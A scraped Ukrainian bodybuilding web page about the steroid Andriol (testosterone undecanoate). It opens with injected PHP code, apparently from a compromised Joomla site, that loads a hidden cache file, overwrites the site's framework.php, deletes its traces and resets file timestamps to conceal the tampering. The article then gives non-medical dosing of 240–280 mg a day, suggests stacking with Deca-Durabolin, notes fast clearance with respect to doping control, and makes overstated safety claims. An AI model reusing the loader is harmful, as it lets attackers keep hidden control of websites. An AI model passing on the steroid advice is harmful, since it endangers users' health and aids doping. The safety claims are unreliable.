$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Андріол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Андріол

АндріолАндріол - один з небагатьох нових стероїдів, які з'явилися в останні роки. На відміну від більшості анаболічних стероїдів, які вийшли на ринок ще в 50-60-ті роки (а частково вже встигли і зникнути), Андріол існує всього лише з початку 80-х. Ця обставина, ймовірно, є поясненням того, чому Андріол займає серед стероїдів особливе місце. Це - революційний стероїд, тому що поряд з метилтестостероном є єдиним оральнодіючим препаратом тестостерону. Сам тестостерон при оральному прийомі абсолютно недієвий, тому що резервується через портальну вену і швидко деактивується в печінці. Діюча хімічна речовина, яка міститься у Андріолі, тестостеронундеканоат всмоктується через кишечник і в обхід печінки надходить в лімфатичну систему, так що цей препарат дієвий при оральному застосуванні. При цьому не виявляється ні найменшого впливу на функцію печінки. Тестостеронундеканоат - це складний ефір жирної кислоти натурального андроген - тестостерону і перетворюється в організмі людини здебільшого в дігідротестерон, продукт метаболізму тестостерону. Тому Андріол лише мінімально ароматизований, тобто тільки незначна частина цієї речовини може перетворюватися на естрогени, оскільки дігідротестерон НЕ ароматизований. Тому Андріол не виявляє у тих, хто його приймає явищ фемінізації, таких наприклад: як гінекомастія або підвищене утворення і накопичення жиру. Тому це бажана альтернатива для атлетів, у яких виникають проблеми зі звичайними ін'єкційними препаратами тестостерону. На цій підставі Андріол годиться для підготовки до змагань. Друга перевага - неароматизованість Андріолу - дає можливість організму не відчувати впливу стероїду на власну репродукцію гормону, що трапляється лише у випадках тривалого лікування високими дозами. Оскільки Андріол дуже швидко виводиться організмом, це слід враховувати при змаганнях з допінг-контролем. Жінки повинні уникати використання Андріола, тому що андрогенні компоненти - як і взагалі у всіх тестостеронів - дуже сильно проявляються в організмі при прийомі цього препарату. При його використанні іноді виникають явища підвищеного кров'яного тиску, скупчення рідини в організмі, акне, суперсексуальності і у жінок все це призводить до явищ маскулінізаціі. Андріол слід зберігати в прохолодному місці (від 6 до 15 градусів) краще в холодильнику. Оскільки капсули дуже чутливі до впливу тепла, то при попаданні на них прямих сонячних променів, наприклад, в машині, ці капсули швидко можуть розтанути і перетворитися на невизначеної форми масу. Внаслідок його незвичайної форми випуску, андріол дуже важко підробити. Оригінальний тестостеронундеканоут випускається в маленьких, овальної форми червоних капсулах.

Андріол можна вважати головним оральним препарат для обережних атлетів, які вже мають досвід застосування ін'єкційного тестостерону і знають про його численні побічні явища, і для літніх атлетів. Той, хто приймає його в дозах менших, ніж 240 - 280 мг на день, буде розчарований його дією. Велика перевага андріола - його добра переносимість. Він може, наприклад, довго застосовуватися в поєднанні з Дека - дураболіном і в цій комбінації він є альтернативою знаменитому поєднанню Діанабол - Дека - дураболін, особливо для спортсменів, які свідомо ставляться до свого здоров'я. Теоретично Андріол так само швидко і надійно нарощує силу і масу, у поєднанні зі знаменитим накопиченням води, як і ін'єкційні Тестостерон сустанон 250 і Тестостерон тривалої дії, які вже добре зарекомендували себе. Але на жаль це не той випадок. Атлети, які бажають під час підготовки до змагань зібрати занадто багато води за допомогою ін'єкційних тестостеронів тривалої дії і виглядати гладким і пружним, не відмовляючись від "тіста", мали б щонайменше не мати естрогенно-обумовлених проблем при дозуванні до 240 мг Анріола вдень і не мати редукції в ретенції води. У цій фразі необхідно, тримати вміст естрогену на якомога нижчому рівні, оскільки інакше будь-яка найкраща дієта виявиться марною. Застосування Андріола на цьому етапі має сенс і приносить, як правило, прийнятні результати. В іншому випадку Андріол - мабуть, швидше засіб для любителів-культуристів.
 
Статті СТЕРОЇДИ Андріол